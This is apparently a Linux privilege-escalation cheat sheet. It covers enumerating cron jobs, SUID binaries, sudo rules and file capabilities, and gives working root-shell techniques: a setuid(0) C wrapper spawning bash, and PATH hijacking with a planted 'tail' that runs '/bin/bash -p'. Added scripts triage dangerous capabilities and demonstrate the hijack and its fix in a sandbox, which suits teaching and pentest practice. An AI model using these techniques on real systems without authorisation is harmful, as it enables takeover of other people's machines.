Look at running processes and at scripts that execute other programs, and check whether any of them is a known-vulnerable version. One example: chkrootkit v0.49 (running as root).

```
ps aux
```

Note: another user (e.g., root) may be running a cron job that executes a script periodically, and you may not be able to see it: other users' crontabs under /var/spool/cron are not readable, and a short-lived job rarely shows up in `ps aux`. Therefore it is crucial to identify and enumerate every program that could be vulnerable (/etc/crontab, /etc/cron.*, and systemd timers included).
```
# World-writable files - e.g. maybe you can edit the shadow file
find / -not -type l -perm -o+w 2>/dev/null
```

Check what sudo allows:

```
sudo -l
# Search on https://gtfobins.github.io/ how to exploit
```

Find all SUID binaries:

```
find / -perm -4000 2>/dev/null
```

Well-known binary
Search for the binary on GTFOBins to identify potential exploitation techniques.
Custom binary
Premise: you have binary_name (with the SUID bit set) that uses/loads/executes loaded_binary, and loaded_binary (or its directory) is writable by you.

Extract strings from the binary and look for shared libraries or binaries being loaded / executed at runtime:

```
strings binary_name
```

(1) Method

Overwrite the loaded binary with a copy of bash:

```
cp /bin/bash /path/to/loaded_binary
```

Note: bash drops the effective uid when it differs from the real uid unless started with `-p`, so this only yields a root shell if binary_name calls setuid(0) before executing loaded_binary. If it does not, use method (2), which sets the ids itself.

(2) Method

Delete the loaded binary and replace it with a new one:

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    /* make real uid/gid 0 too, so the interactive bash does not drop privileges */
    setuid(0);
    setgid(0);
    system("/bin/bash -i");
    return 0;
}
```

```
# Compile
gcc binary.c -o <loaded_binary>
# Run the binary
./binary_name
```

Since Linux 2.2, the kernel has divided the traditional superuser privileges into distinct units called capabilities. These capabilities can be independently enabled or disabled, offering more fine-grained control over process privileges. However, if misconfigured (for example cap_setuid or cap_dac_override set on a binary any user can run), they can be abused by an attacker to escalate privileges and gain root access.

```
/usr/sbin/getcap -r / 2>/dev/null
```

Search for the binary on GTFOBins to identify potential exploitation techniques; the "Capabilities" entries there say which capability each binary can abuse.
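On a big host `getcap -r /` prints dozens of lines, most of them harmless (cap_net_raw on ping and friends). The following is an added example, my own script rather than anything from the original page: it filters getcap output down to the files whose Effective or Permitted set carries a capability that by itself bypasses or changes privilege checks, which is the short list worth looking up on GTFOBins. The DANGEROUS_CAPS list is an assumption (a starting point, not exhaustive) and the getcap lines in `sample_getcap` are constructed, not from a real system.

```shell
#!/bin/sh
# Added example, not from the original page: triage `getcap -r /` output for
# capabilities that commonly lead to root. The sample input at the bottom is
# constructed.

# Capabilities that let a process bypass or change privilege checks on their
# own (assumption: a starting list, not an exhaustive one).
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_dac_override|cap_dac_read_search|cap_sys_admin|cap_sys_ptrace|cap_sys_module|cap_chown|cap_fowner|cap_setfcap|cap_sys_rawio'

# Reads getcap output on stdin and prints "<path><TAB><dangerous caps>" for
# every file whose Effective or Permitted set contains one of them.
# Both output styles are accepted:
#   /usr/bin/python3 = cap_setuid+ep     (libcap < 2.41)
#   /usr/bin/python3 cap_setuid=ep       (libcap >= 2.41)
triage_caps() {
  awk -v pat="$DANGEROUS_CAPS" '
    {
      path = $1
      caps = $0
      sub(/^[^ ]+ (= )?/, "", caps)         # drop the path and optional "="
      n = split(caps, groups, / /)          # e.g. cap_a,cap_b+ep cap_c+i
      hits = ""
      for (i = 1; i <= n; i++) {
        g = groups[i]
        if (g !~ /[+=][a-z]*[ep]/) continue # inheritable-only: not usable directly
        split(g, parts, /[+=]/)             # parts[1] = names, parts[2] = flags
        m = split(parts[1], names, /,/)
        for (j = 1; j <= m; j++)
          if (names[j] ~ "^(" pat ")$")
            hits = hits (hits == "" ? "" : ",") names[j]
      }
      if (hits != "") printf "%s\t%s\n", path, hits
    }'
}

# Constructed sample of getcap output (not taken from a real host).
sample_getcap() {
  cat <<'EOF'
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/gdb cap_sys_ptrace=ep
/usr/bin/tar cap_dac_read_search=ep
/usr/sbin/arping = cap_net_raw+ep
/opt/tool = cap_dac_override+i
/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip
EOF
}

# Runs the triage over the sample; the hits are python3.8, gdb and tar.
# /opt/tool is skipped because cap_dac_override is only Inheritable there.
run_triage_demo() {
  sample_getcap | triage_caps
}

run_triage_demo
```

On a real box replace `sample_getcap` with `/usr/sbin/getcap -r / 2>/dev/null | triage_caps`. Inheritable-only entries are skipped because the capability is not raised into the Effective set at execve unless the file also has it in Permitted, so such a binary cannot be abused directly.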
Analyze the mail for any sensitive information:

```
ls /var/mail
```

Relative paths in a privileged program (PATH hijacking). Check what sudo allows, then inspect the program for commands it invokes without an absolute path:

```
sudo -l
strings <program_name>
```

Suppose the strings output contains:

```
tail -f /var/log/nginx/access.log
```

`tail` has no leading slash, so the shell resolves it through PATH. Put a directory you control first in PATH and plant your own `tail` there (the `-p` keeps bash from dropping the effective uid):

```
# /tmp/tail
#!/bin/bash
/bin/bash -p
```

```
chmod +x /tmp/tail
export PATH=/tmp:$PATH
./<program_name>
```

Caveat: this works as shown when <program_name> is SUID and executed directly. If it has to be run through sudo, sudo normally resets PATH to its secure_path, so the hijack only works when that option is absent from sudoers or the entry keeps the caller's PATH.
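Both the "Custom binary" section and the PATH-hijack above boil down to the same mechanic: a privileged program names a helper it does not fully control, and the attacker supplies that helper. The following is an added example, my own code rather than anything from the original page, that reproduces the PATH part in a throwaway directory so it runs as any user: a vulnerable victim that calls `tail` by bare name, a hardened victim that pins PATH and calls tail by absolute path, and a planted `tail`. The root part is deliberately left out (the SUID bit is ignored on scripts); in the real case the planted file is the `/bin/bash -p` script shown above. The lab directory layout and file names are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not from the original page: PATH-hijack mechanics in a
# sandbox, without SUID. Shows why "tail" vs "/usr/bin/tail" matters.

# Creates a lab with two victims and a planted tail; prints the lab path.
build_lab() {
  lab=$(mktemp -d "${TMPDIR:-/tmp}/pathlab.XXXXXX") || return 1
  mkdir -p "$lab/hijack" "$lab/bin"
  # Vulnerable victim: calls tail by name, so it is resolved through PATH.
  printf '#!/bin/sh\ntail -n1 "$1"\n' > "$lab/bin/victim_vuln"
  # Hardened victim: pins PATH to trusted dirs and uses an absolute path
  # (resolved here, before any PATH tampering, so the demo is portable).
  real_tail=$(command -v tail)
  printf '#!/bin/sh\nPATH=/usr/bin:/bin\nexport PATH\n%s -n1 "$1"\n' "$real_tail" > "$lab/bin/victim_fixed"
  # The planted binary that gets picked up instead of the real tail.
  printf '#!/bin/sh\necho HIJACKED\n' > "$lab/hijack/tail"
  chmod +x "$lab/bin/victim_vuln" "$lab/bin/victim_fixed" "$lab/hijack/tail"
  echo "real line" > "$lab/log.txt"
  echo "$lab"
}

# Runs one victim ($2 = vuln or fixed) with the hijack dir first in PATH,
# which is exactly what `export PATH=/tmp:$PATH; ./<program_name>` does.
run_victim() {
  PATH="$1/hijack:$PATH" "$1/bin/victim_$2" "$1/log.txt"
}

# Which file the shell picks for "tail" under the attacker-controlled PATH.
resolve_tail() {
  ( PATH="$1/hijack:$PATH"; command -v tail )
}

demo() {
  lab=$(build_lab)
  echo "tail resolves to:  $(resolve_tail "$lab")"
  echo "vulnerable victim: $(run_victim "$lab" vuln)"
  echo "hardened victim:   $(run_victim "$lab" fixed)"
  rm -rf "$lab"
}

demo
```

The vulnerable victim prints HIJACKED, the hardened one prints the real last line of the log. The same fix applies to a C program that calls `system("tail ...")`: use an absolute path and, better, `execve` with an explicit environment, since `system()` hands the command to `/bin/sh` and inherits the caller's PATH.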